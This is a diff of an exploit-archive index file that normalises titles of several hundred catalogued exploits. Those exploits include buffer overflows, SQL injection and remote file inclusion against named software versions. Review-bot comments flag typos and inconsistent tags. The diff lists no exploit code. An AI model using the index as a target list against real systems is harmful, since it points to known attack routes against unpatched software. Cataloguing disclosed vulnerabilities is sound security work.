 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps,0
-18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 - Backend Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps,0
+18884,platforms/php/webapps/18884.txt,"S9Y Serendipity 1.6 - (Backend) Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps,0
 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - (Cross-Site Request Forgery / Persistent Cross-Site Scripting) Multiple Vulnerabilities",2012-05-16,"Ivano Binetti",php,webapps,0
 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0
 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure",2012-05-16,LiquidWorm,php,webapps,0
@@ -16406,11 +16406,11 @@ id,file,description,date,author,platform,type,port
 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0
 18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0
 18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0
-18964,platforms/windows/dos/18964.txt,"Irfanview 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0
+18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0
 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0
 18965,platforms/php/webapps/18965.html,"4PSA VoIPNow Professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0
 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0
-18972,platforms/windows/dos/18972.txt,"Irfanview 4.33 - Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0
+18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn .TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0
 18973,platforms/windows/remote/18973.rb,"GIMP script-fu - Server Buffer Overflow (Metasploit)",2012-06-02,Metasploit,windows,remote,0
 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Persistent Cross-Site Scripting",2012-06-02,"Henry Hoggard",php,webapps,0
 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0
@@ -16526,7 +16526,7 @@ id,file,description,date,author,platform,type,port
 19112,platforms/linux/remote/19112.c,"Multiple OSes - BIND Buffer Overflow (2)",1998-04-08,prym,linux,remote,0
 19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23
 19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0
-19385,platforms/windows/dos/19385.txt,"Irfanview 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0
+19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0
 19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0
 19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0
 19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0
@@ -16860,7 +16860,7 @@ id,file,description,date,author,platform,type,port
 19480,platforms/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,multiple,local,0
 19481,platforms/php/webapps/19481.txt,"WordPress Plugin Paid Business Listings 1.0.2 - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0
 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 - '.FIT' File Format Denial of Service",2012-06-30,"Joseph Sheridan",multiple,dos,0
-19483,platforms/windows/dos/19483.txt,"Irfanview JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0
+19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0
 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,remote,3817
 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow",1999-08-31,"Przemyslaw Frasunek",linux,local,0
 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0
@@ -16896,7 +16896,7 @@ id,file,description,date,author,platform,type,port
 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS - ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0
 19793,platforms/php/webapps/19793.txt,"Magento eCommerce - Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0
-19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,local,0
+19519,platforms/windows/local/19519.rb,"IrfanView JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,local,0
 19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Root Exploit (2)",2012-07-01,kingcope,bsd,remote,0
 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
@@ -16989,7 +16989,7 @@ id,file,description,date,author,platform,type,port
 19607,platforms/windows/remote/19607.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (1)",1999-11-09,UNYUN,windows,remote,0
 19608,platforms/windows/remote/19608.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote,0
 19609,platforms/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14b - Relative Path",1999-11-08,"Shawn Hillis",freebsd,local,0
-19610,platforms/windows/local/19610.c,"Irfan Skiljan IrfanView32 3.0.7 - Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0
+19610,platforms/windows/local/19610.c,"IrfanView32 3.0.7 - Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0
 19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 - User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote,0
 19612,platforms/windows/remote/19612.pl,"Trend Micro Interscan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0
 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 - C&C Server Buffer Overflow (Metasploit)",2012-07-06,Metasploit,windows,remote,3460
@@ -18085,7 +18085,7 @@ id,file,description,date,author,platform,type,port
 20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0
 20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0
 20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 - FTP Core Dump Shadow Password Recovery",2001-04-17,warning3,solaris,remote,0
-40423,platforms/php/webapps/40423.txt,"Joomla! Component Event Booking 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80
+40423,platforms/php/webapps/40423.txt,"Joomla! Component 'com_eventbooking' 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80
 20765,platforms/linux/remote/20765.pl,"Linux Kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0
 20766,platforms/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 - CDE dtsession Buffer Overflow",2001-04-11,"Last Stage of Delirium",unix,local,0
 20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0
@@ -19608,7 +19608,7 @@ id,file,description,date,author,platform,type,port
 22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0
 22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0
 22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0
-40413,platforms/php/webapps/40413.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80
+40413,platforms/php/webapps/40413.txt,"Joomla! Component 'com_videogallerylite' 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80
 22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0
 22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0
 22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0
@@ -19961,8 +19961,8 @@ id,file,description,date,author,platform,type,port
 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0
 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0
 22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,windows,dos,0
-22680,platforms/windows/dos/22680.txt,"Irfanview - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
-22681,platforms/windows/dos/22681.txt,"Irfanview - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
+22680,platforms/windows/dos/22680.txt,"IrfanView - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
+22681,platforms/windows/dos/22681.txt,"IrfanView - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0
 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0
 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow",2012-11-13,Vulnerability-Lab,windows,dos,0
@@ -20557,7 +20557,7 @@ id,file,description,date,author,platform,type,port
 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0
 23286,platforms/php/webapps/23286.txt,"Joomla! Component JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0
 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0
-23288,platforms/windows/dos/23288.txt,"Irfanview 4.33 - 'IMXCF.dll' Plugin Code Execution",2012-12-11,beford,windows,dos,0
+23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 - 'IMXCF.dll' Plugin Code Execution",2012-12-11,beford,windows,dos,0
 23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - Cross-Site Request Forgery",2012-12-11,sajith,php,webapps,0
 23290,platforms/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow (Metasploit)",2012-12-11,Metasploit,windows,remote,0
 23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums - Multiple Fields HTML Injection",2003-10-30,ProXy,php,webapps,0
@@ -21901,7 +21901,7 @@ id,file,description,date,author,platform,type,port
 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote,0
 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",linux,remote,0
 24696,platforms/linux/dos/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)",2004-11-21,"Richard Hart",linux,dos,0
-24697,platforms/php/webapps/24697.txt,"Serendipity 0.x - exit.php HTTP Response Splitting",2004-10-21,ChaoticEvil,php,webapps,0
+24697,platforms/php/webapps/24697.txt,"S9Y Serendipity 0.x - 'exit.php' HTTP Response Splitting",2004-10-21,ChaoticEvil,php,webapps,0
 24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.Threads 3.4/3.5 - Denial of Serviceearch.php SQL Injection",2004-10-21,"Florian Rock",php,webapps,0
 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP - '.WAV' File Handler Denial of Service",2004-10-22,HexView,windows,dos,0
 24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script - Information Disclosure",2004-10-22,ls,cgi,webapps,0
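Review bot: The context row 24698 directly below the changed line reads `UBB.Threads 3.4/3.5 - Denial of Serviceearch.php SQL Injection`, which looks like an earlier bulk replacement of "dos" with "Denial of Service" that also hit a file name (presumably `dosearch.php`). As it stands the row is mislabelled for anyone triaging by vulnerability class, and a search for the affected script will not find it. Since this commit is already normalising titles in this hunk, consider restoring it along the lines of `"UBBCentral UBB.Threads 3.4/3.5 - 'dosearch.php' SQL Injection"` after confirming the file name against 24698.txt, and grepping the index for other `Denial of Service` strings fused to a following word.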
@@ -24460,7 +24460,7 @@ id,file,description,date,author,platform,type,port
 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0
 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,"cr4wl3r ",php,webapps,0
 27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
-27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0
+27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0
 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0
 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0
 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name Parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0
@@ -24869,7 +24869,7 @@ id,file,description,date,author,platform,type,port
 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
 27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - search.php q Parameter Cross-Site Scripting",2006-06-05,Luny,php,webapps,0
 27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 - 'index.php' catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0
-27703,platforms/windows/remote/27703.py,"PCMan FTP Server 2.07 - STOR Command Buffer Overflow",2013-08-19,Polunchis,windows,remote,0
+27703,platforms/windows/remote/27703.py,"PCMan FTP Server 2.07 - 'STOR' Command Buffer Overflow",2013-08-19,Polunchis,windows,remote,0
 27704,platforms/windows/remote/27704.rb,"Cogent DataHub - HTTP Server Buffer Overflow (Metasploit)",2013-08-19,Metasploit,windows,remote,0
 27705,platforms/multiple/remote/27705.rb,"Java - storeImageArray() Invalid Array Indexing (Metasploit)",2013-08-19,Metasploit,multiple,remote,0
 27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0
@@ -24907,7 +24907,7 @@ id,file,description,date,author,platform,type,port
 27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 - Modal Dialog Manipulation",2006-04-26,"Matthew Murphy",windows,remote,0
 27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0 / Windows Mail - MHTML URI Handler Information Disclosure",2006-04-27,codedreamer,windows,dos,0
 27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0
-27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 - 'PASS' Buffer Overflow (SEH)",2013-08-21,Wireghoul,windows,remote,21
+27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow",2013-08-21,Wireghoul,windows,remote,21
 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0
 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - gate2.php Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0
 27751,platforms/php/webapps/27751.txt,"WordPress Plugin ThinkIT 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0
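Review bot: The SEH qualifier is written two ways within this one commit: row 27747 here moves it inline (`'PASS' SEH Buffer Overflow`), while row 12380 in the earlier Rumba FTP hunk keeps the trailing tag (`PASV Buffer Overflow (SEH)`). Trailing parenthesised tags such as `(SEH)`, `(PoC)` and `(Metasploit)` are used throughout the visible rows, and tooling or analysts filtering on those tags would miss the inline form. Unless the inline form is the new convention, consider keeping `"freeFTPd 1.0.10 - 'PASS' Buffer Overflow (SEH)"`.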
@@ -25036,7 +25036,7 @@ id,file,description,date,author,platform,type,port
 27876,platforms/php/webapps/27876.txt,"MusicBox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0
 27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server - Remote Command Execution (Metasploit)",2013-08-26,Metasploit,windows,remote,7770
 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0
-27879,platforms/php/webapps/27879.txt,"Joomla! Component VirtueMart 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0
+27879,platforms/php/webapps/27879.txt,"Joomla! Component 'com_virtuemart' 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0
 27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 - popup.php Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0
 27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 - ODP.php Cross-Site Scripting",2006-05-15,Kiki,php,webapps,0
 27882,platforms/java/dos/27882.java,"Sun Java Applet - Font.createFont Remote Denial of Service",2006-05-15,"Marc Schoenefeld",java,dos,0
@@ -25319,7 +25319,7 @@ id,file,description,date,author,platform,type,port
 28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0
 28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0
 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0
-28199,platforms/php/webapps/28199.txt,"phpBB 1.2.4 For Mambo - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0
+28199,platforms/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0
 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 - Tiny_mce_gzip.php Directory Traversal",2006-07-10,armin390,php,webapps,0
 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0
 28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0
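Review bot: The new title for 28199 has a typo, `Mambo Componen phpBB 1.2.4`, so a search of the index for "Mambo Component" will not return this entry, which undoes the point of the rename. It should read `"Mambo Component phpBB 1.2.4 - Multiple Remote File Inclusion"`. The other Mambo rows in this commit also quote the component id (`'com_akogallery'`, `'com_acnews'`, `'com_mambads'`), while this row and 28233 in the next hunk (`Mambo Module Calendar 1.5.7 - 'Com_Calendar.php'`) do not, so it may be worth settling on one form before merging.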
@@ -25352,7 +25352,7 @@ id,file,description,date,author,platform,type,port
 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0
 28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 - LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0
 28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0
-28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo - Com_Calendar.php Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
+28233,platforms/php/webapps/28233.txt,"Mambo Module Calendar 1.5.7 - 'Com_Calendar.php' Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
 28234,platforms/linux/dos/28234.txt,"MySQL 4.x/5.x - Server Date_Format Denial of Service",2006-07-18,"Christian Hammers",linux,dos,0
 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote,0
 28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0
@@ -25442,7 +25442,7 @@ id,file,description,date,author,platform,type,port
 40639,platforms/windows/dos/40639.py,"Baby FTP server 1.24 - Denial of Service",2016-10-27,n30m1nd,windows,dos,0
 28326,platforms/php/webapps/28326.txt,"VWar 1.x - war.php page Parameter Cross-Site Scripting",2006-08-03,mfoxhacker,php,webapps,0
 28327,platforms/php/webapps/28327.txt,"VWar 1.x - war.php Multiple Parameter SQL Injection",2006-08-03,mfoxhacker,php,webapps,0
-28328,platforms/windows/remote/28328.rb,"PCMan FTP Server 2.07 - STOR Command Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21
+28328,platforms/windows/remote/28328.rb,"PCMan FTP Server 2.07 - 'STOR' Command Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21
 28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0
 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0
 28331,platforms/windows/remote/28331.txt,"Oracle Java - ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0
@@ -25483,7 +25483,7 @@ id,file,description,date,author,platform,type,port
 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
 28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0
 28368,platforms/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0
-28369,platforms/windows/dos/28369.dpr,"Irfanview 3.98 - '.ANI' Image File Denial of Service",2006-08-09,sehato,windows,dos,0
+28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 - '.ANI' Image File Denial of Service",2006-08-09,sehato,windows,dos,0
 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
@@ -25508,7 +25508,7 @@ id,file,description,date,author,platform,type,port
 28391,platforms/linux/dos/28391.html,"Mozilla Firefox 1.x - XML Handler Race Condition Memory Corruption",2006-08-15,"Michal Zalewski",linux,dos,0
 28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0
 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps,0
-28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component - Reporter.sql.php Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0
+28396,platforms/php/webapps/28396.txt,"Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0
 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0
 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 - SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0
 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0
@@ -25516,20 +25516,20 @@ id,file,description,date,author,platform,type,port
 28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0
 40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0
 28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0
-28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
-28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
+28403,platforms/php/webapps/28403.txt,"Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
+28404,platforms/php/webapps/28404.txt,"Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
 28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,linux,local,0
 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0
 28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (1)",2013-09-20,xistence,php,remote,0
